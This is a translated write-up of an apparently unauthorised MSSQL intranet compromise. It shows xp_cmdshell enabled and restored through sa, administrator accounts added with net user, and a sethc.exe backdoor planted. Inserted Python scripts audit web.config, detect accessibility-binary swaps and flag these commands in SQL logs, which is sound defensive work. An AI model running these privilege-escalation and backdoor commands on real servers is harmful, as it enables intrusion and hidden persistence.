MSSQL Intranet penetration

Source: Internet
Author: User
Tags: mssql server


Environment: Windows Server 2003

IIS: 6.0, with PHP support

Databases: MSSQL and MySQL

Website type: ASPX

This article focuses on intranet penetration and privilege escalation; how the webshell was obtained is not described.

Anyone familiar with intrusion and penetration knows that after obtaining a webshell, the first task is to find where on the server a privilege escalation vulnerability lies.

Judging from this site, with MSSQL and MySQL and support for both ASPX and PHP, the privileges available to work with are already considerable.

First, let's see what the directories reveal.

Check the program directories first. Is there any information about SU, MySQL and the like?

E: drive: can be viewed.

F: drive: can be viewed.

The ASPX site uses an MSSQL database, but the user whose password it exposes does not have the highest privilege level; it is only a DB user, so privileges cannot be obtained from it immediately.

Go through the other sites on the server and search their directories one by one.

The web.config in one directory contains an sa user.

Database connection information:

Source=gzzx;Initial Catalog=SMSCenter;Persist Security Info=True;User ID=sa;Password=****
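The root cause of this compromise is that plaintext sa login sitting in a site's web.config. The Python script below is an added example, not code from the original article: it parses the connectionStrings section of a web.config, folds the ADO.NET keyword aliases (uid/pwd/Server) into one form, and flags any entry that uses the sa login, stores a plaintext password, or sets Persist Security Info. The embedded web.config is constructed for the example (the server and catalog names follow the page; the password is a placeholder), and the finding codes are names chosen here, not a standard.

```python
"""Audit the connectionStrings section of an ASP.NET web.config for the weakness
that opened this intranet: a sysadmin-level login (sa) stored in plaintext."""
import xml.etree.ElementTree as ET

# Constructed sample web.config. The first entry mirrors the connection string
# quoted on the page (server and catalog names as given; password is a placeholder).
SAMPLE_WEB_CONFIG = """<configuration>
  <connectionStrings>
    <add name="SMSCenter"
         connectionString="Data Source=gzzx;Initial Catalog=SMSCenter;Persist Security Info=True;User ID=sa;Password=EXAMPLE_PASSWORD"
         providerName="System.Data.SqlClient" />
    <add name="Portal"
         connectionString="Data Source=gzzx;Initial Catalog=Portal;Integrated Security=SSPI"
         providerName="System.Data.SqlClient" />
    <add name="Shop"
         connectionString="Server=gzzx;Database=Shop;uid=shop_app;pwd=EXAMPLE_PASSWORD"
         providerName="System.Data.SqlClient" />
  </connectionStrings>
</configuration>
"""

# ADO.NET accepts several spellings for the same keyword; fold them to one name.
KEY_ALIASES = {
    "uid": "user id", "user": "user id",
    "pwd": "password",
    "server": "data source", "address": "data source", "addr": "data source",
    "network address": "data source",
    "database": "initial catalog",
}


def parse_connection_string(text):
    """Split 'Key=Value;Key=Value' into a dict keyed by normalised, lower-case names."""
    result = {}
    for part in text.split(";"):
        if "=" not in part:
            continue
        key, _, value = part.partition("=")
        key = key.strip().lower()
        result[KEY_ALIASES.get(key, key)] = value.strip()
    return result


def audit_connection_string(text):
    """Return the finding codes (names chosen for this example) for one connection string."""
    cs = parse_connection_string(text)
    findings = []
    if cs.get("user id", "").lower() == "sa":
        findings.append("sa-login")               # sysadmin: xp_cmdshell is one sp_configure away
    if cs.get("password"):
        findings.append("plaintext-password")     # readable by anyone who can read the file
    if cs.get("persist security info", "").lower() in ("true", "yes"):
        findings.append("persist-security-info")  # password stays retrievable from an open connection
    return findings


def audit_web_config(xml_text):
    """Map each named connection string in a web.config to its findings.

    A section encrypted with aspnet_regiis carries a configProtectionProvider
    attribute and has no readable <add> entries; report that rather than 'clean'."""
    section = ET.fromstring(xml_text).find("connectionStrings")
    if section is None:
        return {}
    if section.get("configProtectionProvider"):
        return {"<encrypted>": ["section-encrypted"]}
    return {add.get("name"): audit_connection_string(add.get("connectionString", ""))
            for add in section.findall("add")}


if __name__ == "__main__":
    for name, findings in audit_web_config(SAMPLE_WEB_CONFIG).items():
        print(f"{name}: {', '.join(findings) or 'ok'}")
```

Run it over every site's web.config during a deployment review. The durable fix is a dedicated SQL login per application holding only the database roles it needs (a non-sysadmin login cannot run sp_configure or xp_cmdshell at all), plus encrypting the section with `aspnet_regiis -pe connectionStrings -app /SiteName` so that a file read through a webshell does not yield usable credentials.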

Open aspxspy and use its database connection function.

The login succeeds, and the sa account does not seem to have had its privileges reduced.

The connection shows MSSQL 2005. First enable xp_cmdshell.

Run the "whoami" command.

Good: SYSTEM privileges. Next, add an account.

Exec master.dbo.xp_cmdshell 'net user admin ***** /add'

Exec master.dbo.xp_cmdshell 'net localgroup administrators admin /add'

Check whether port 3389 is listening.

Exec master.dbo.xp_cmdshell 'netstat -ano'

OK, the status is normal.

Exec master.dbo.xp_cmdshell 'ipconfig /all' shows that the machine is configured with an intranet IP address.

The IP address the domain name resolves to accepts connections on 3389.

This indicates that the administrators have set up port mapping, so there is no need to forward the port ourselves. That saves a lot of effort!

This gives us one server. From the website's SQL connection string, it is not hard to see that there are other SQL servers on the intranet.

The penetration continues...

The intranet host at .200 also runs MSSQL with sa privileges.

Use aspxspy's database connection function.

Frustratingly, it cannot connect:

[DBNETLIB][ConnectionOpen (Connect()).]SQL Server does not exist or access is denied.

In principle, if the database is in use, it should be possible to connect to it. Is TCP/IP not configured for database access? That is the question. If you are impatient, try it from the server itself through 3389. MSSQL is installed on that server, including Query Analyzer and Enterprise Manager, and these become our tools. Haha!

Query Analyzer cannot connect either.

First, test whether the MSSQL Server machine exists.

A successful response indicates that the server exists.

Run mstsc and try to connect to the MySQL host on 3389; an XP logon screen appears. Rather disappointing.

Try the name resolution service.

Click Browse to list the available MSSQL Server names; which one is the right machine is not actually known, but the 200 and IP200 machines look similar. Enter sa and the password.

Return to the query window and try xp_cmdshell.

Not found; restore it:

use master; dbcc addextendedproc ('xp_cmdshell', 'xplog70.dll')

OK!

Run the "whoami" command, although XP does not support whoami.

Exec xp_cmdshell 'net user 123 123 /add'

A system error is returned. Could it be that there is no permission to add users? Not really, as it turns out.

Idea: use the sethc.exe replacement trick on 3389.

Exec xp_cmdshell 'copy c:\windows\assumer.exe c:\windows\system32\sethc.exe' to replace it?

The problem arises again: it reports that disk space is insufficient.

Use xp_dirtree to view the C drive:

Exec master..xp_dirtree 'C:\', 1, 1

List the file directories and delete the backups of a database to free space.

Execute exec xp_cmdshell 'copy c:\windows\cmder.exe c:\windows\system32\sethc.exe'

It reports that one file has been copied, but pressing Shift five times at the 3389 logon screen does not bring anything up.
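The sethc.exe swap above works because the logon screen launches whatever binary sits at that path, so the defender's check is whether any of the accessibility helpers in System32 is byte-identical to a shell. The Python below is an added example, not from the article: it hashes the helpers and the shells and reports any match. `demo()` builds a constructed System32 stand-in in a temporary directory with placeholder bytes (not real Windows binaries); the helper names are the ones Windows launches from the logon screen.

```python
"""Detect an accessibility helper in System32 that has been replaced by a copy
of a command shell (the sethc.exe trick in the walkthrough above)."""
import hashlib
import tempfile
from pathlib import Path

# Helpers reachable from the logon screen (Shift x5, Ease of Access button, Win+P).
ACCESSIBILITY_BINARIES = ("sethc.exe", "utilman.exe", "osk.exe",
                          "narrator.exe", "magnify.exe", "displayswitch.exe")
SHELL_BINARIES = ("cmd.exe", "powershell.exe")


def sha256_file(path):
    """Stream a file through SHA-256 and return the hex digest."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def find_swapped_accessibility_binaries(system32):
    """Return the names of accessibility helpers whose content equals a shell binary."""
    system32 = Path(system32)
    shell_hashes = {sha256_file(system32 / n) for n in SHELL_BINARIES
                    if (system32 / n).is_file()}
    swapped = []
    for name in ACCESSIBILITY_BINARIES:
        p = system32 / name
        if p.is_file() and sha256_file(p) in shell_hashes:
            swapped.append(name)
    return swapped


def demo():
    """Run the check against a constructed System32 stand-in in a temp directory.
    File contents are fake placeholders, not Windows binaries."""
    with tempfile.TemporaryDirectory() as d:
        s32 = Path(d)
        (s32 / "cmd.exe").write_bytes(b"MZ-fake-cmd-shell")
        (s32 / "sethc.exe").write_bytes(b"MZ-fake-cmd-shell")  # replaced, as in the walkthrough
        (s32 / "utilman.exe").write_bytes(b"MZ-fake-utilman")  # untouched
        return find_swapped_accessibility_binaries(s32)


if __name__ == "__main__":
    print(demo())  # ['sethc.exe']
```

On a real host call `find_swapped_accessibility_binaries(r"C:\Windows\System32")`. Both sethc.exe and cmd.exe are Microsoft-signed, so an Authenticode check alone does not notice the swap; that is why the comparison is by content. The disk-full error the author hit first is itself a useful signal: a SYSTEM-level copy into System32 failing, or database backups vanishing right afterwards, is the kind of event a file-integrity or backup monitor should raise.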

Try again.

Exec xp_cmdshell 'net user 123 123 /add' now reports success. The earlier system error was caused by insufficient disk space. Really satisfying!

Exec xp_cmdshell 'net localgroup administrators 123 /add'

Log on through 3389.

Exec xp_cmdshell 'net user 123 /del' deletes the user.
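Both escalation sequences in this walkthrough (enabling xp_cmdshell on the first server, restoring it with addextendedproc on the second, then creating and elevating Windows accounts through it) leave a distinctive trail in any capture of T-SQL statements. The Python below is an added example, not code from the article: it normalises statement text so the spacing variants seen on this page (`master . dbo . xp_cmdshell`, `master..xp_dirtree`) collapse to one form, tags dangerous extended procedures, and classifies the OS command handed to xp_cmdshell. The sample statements are constructed, modelled on the ones in the walkthrough; the tag names and severity levels are choices made for this example.

```python
"""Flag captured T-SQL statements that match the abuse pattern in the
walkthrough: enabling or restoring xp_cmdshell, running it, and using it to
create or elevate Windows accounts or to overwrite logon-screen binaries."""
import re

# Constructed sample statements, in the shape of the `statement` column of a
# SQL Server audit file or any other query log. Modelled on the walkthrough;
# the first two are ordinary application traffic.
SAMPLE_STATEMENTS = [
    "SELECT TOP 10 * FROM SMSCenter.dbo.Outbox WHERE Status = 0",
    "EXEC sp_helpdb",
    "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE",
    "Exec master.dbo.xp_cmdshell 'net user admin ***** /add'",
    "Exec master.dbo.xp_cmdshell 'net localgroup administrators admin /add'",
    "Exec master . dbo . xp_cmdshell 'ipconfig /all'",
    "use master; dbcc addextendedproc ('xp_cmdshell', 'xplog70.dll')",
    "Exec master..xp_dirtree 'C:\\', 1, 1",
    "exec xp_cmdshell 'copy c:\\windows\\cmder.exe c:\\windows\\system32\\sethc.exe'",
]

# Statement-level indicators, matched against normalised lower-case text.
STATEMENT_PATTERNS = {
    "os-command":      re.compile(r"\bexec(?:ute)?\s+(?:master\.(?:dbo)?\.)?xp_cmdshell\b"),
    "xp-enable":       re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1\b"),
    "xp-restore":      re.compile(r"\b(?:sp_|dbcc\s+)addextendedproc\b"),
    "filesystem-enum": re.compile(r"\bxp_(?:dirtree|fileexist)\b"),
    "registry-access": re.compile(r"\bxp_reg(?:read|write)\b"),
    "ole-automation":  re.compile(r"\bsp_oacreate\b"),
}
# Indicators inside the OS command string handed to xp_cmdshell.
OS_PATTERNS = {
    "account-create":     re.compile(r"\bnet\s+user\s+\S+\s+\S+\s*/add\b"),
    "group-elevate":      re.compile(r"\bnet\s+localgroup\s+administrators?\b.*/add\b"),
    "accessibility-swap": re.compile(r"\b(?:copy|move|xcopy)\b.*\\system32\\(?:sethc|utilman|osk|narrator|magnify)\.exe"),
    "recon":              re.compile(r"\b(?:whoami|ipconfig|netstat|systeminfo)\b"),
}
HIGH = {"xp-enable", "xp-restore", "account-create", "group-elevate", "accessibility-swap"}


def normalise(statement):
    """Lower-case and strip spaces around dots so 'master . dbo . xp_cmdshell'
    and 'master..xp_cmdshell' both become a single token chain."""
    s = re.sub(r"\s*\.\s*", ".", statement.lower())
    return re.sub(r"\s+", " ", s).strip()


def analyse_statement(statement):
    """Return (severity, tags) for one statement; severity 0 means no indicator."""
    s = normalise(statement)
    tags = [tag for tag, pat in STATEMENT_PATTERNS.items() if pat.search(s)]
    if "os-command" in tags:
        # Pull out the quoted command passed to the OS ('' is an escaped quote) and classify it.
        m = re.search(r"xp_cmdshell\s+'((?:[^']|'')*)'", s)
        if m:
            tags += [tag for tag, pat in OS_PATTERNS.items() if pat.search(m.group(1))]
    if not tags:
        return 0, []
    return (3 if HIGH.intersection(tags) else 2), tags


def scan(statements):
    """Return (severity, tags, statement) for every statement that matched."""
    hits = []
    for stmt in statements:
        severity, tags = analyse_statement(stmt)
        if severity:
            hits.append((severity, tags, stmt))
    return hits


if __name__ == "__main__":
    for severity, tags, stmt in scan(SAMPLE_STATEMENTS):
        print(f"[sev {severity}] {', '.join(tags):40} {stmt}")
```

Feed `scan()` from the `statement` column returned by `sys.fn_get_audit_file` when a server audit is in place, or from the batch text of an Extended Events `sql_batch_completed` session. On the prevention side, `SELECT value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell'` should stay 0, and the reason the author could flip it is that the web application's login was sa: an application login outside the sysadmin role cannot enable or restore xp_cmdshell in the first place.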

There are still many machines on the intranet, but this penetration ends here.

Conclusion: intranet penetration techniques are not difficult to understand. Careful study shows that every detail and every step can spark an idea. Forwarding from an intranet port to an external connection, and then logging on from 3389 to an internal 3389, is similar to the stepping-stone technique.
